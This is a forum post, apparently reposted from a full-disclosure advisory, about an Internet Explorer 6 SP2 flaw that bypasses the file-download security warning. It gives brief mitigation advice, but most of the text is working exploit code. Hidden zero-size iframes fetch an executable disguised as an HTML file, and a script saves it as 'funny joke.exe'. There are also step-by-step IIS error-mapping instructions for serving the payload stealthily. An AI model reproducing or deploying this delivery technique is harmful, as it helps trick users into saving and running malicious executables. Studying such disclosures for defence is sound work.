Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit
Guest
Posts: n/a
Posts: n/a
Exploit
http://www.k-otik.com/exploits/20041...2Unpatched.php
Microsoft Internet Explorer (including IE for Windows XP SP2) is
reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious
executable file masqueraded as a HTML file.
Secunia did not release the technical details (aka Security by
Obscurity) thus we publish this page (aka Full Disclosure)
Solution
[EN] Disable Active Scripting and the "Hide file extensions for known
file types" option [Tools->Folder Options->View]
[FR] Désactivez Active Scriptig et l'option "Masquer les extensions
des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage]
Credits : go to cyber flash
How does it work ? A.K.A Exploit
The following code requires no special server setup, and should work
from any webpage that IE 6.0 fetches:
<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.docum ent.execCommand('SaveAs',1,'funny
joke.exe');">
here</a>.
</body>
</html>
Also, here's an example that requires modifying the IIS Error Mapping
Properties (see below):
<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.docum ent.execCommand('SaveAs',1,'funny
joke.exe');">
here</a>.
</body>
</html>
Steps to configure IIS:
Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as
follows:
1. Error Code: 404
2. Default Text: Not Found
3. Message Type: URL
4. URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>
The file 'vengy404.htm' intentionally doesn't exist on the server, so
it will trigger a 404 error message as defined above. But, the
javascript code below references the stealthy v.exe data within the
frame 'NotFound' and is linked to 'funny joke.exe' when prompted to
save the file:
javascript:document.frames.NotFound.document.execC ommand('SaveAs',1,'funny
joke.exe');
» The original advisory (mirrored by K-OTik) is available here
--
Jose Manuel Tella Llop
MVP - Windows
jmtella@XXXcompuserve.com (quitar XXX)
http://www.multingles.net/jmt.htm
Este mensaje se proporciona "como está" sin garantías de ninguna
clase, y no otorga ningún derecho.
This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.
Linear Mode
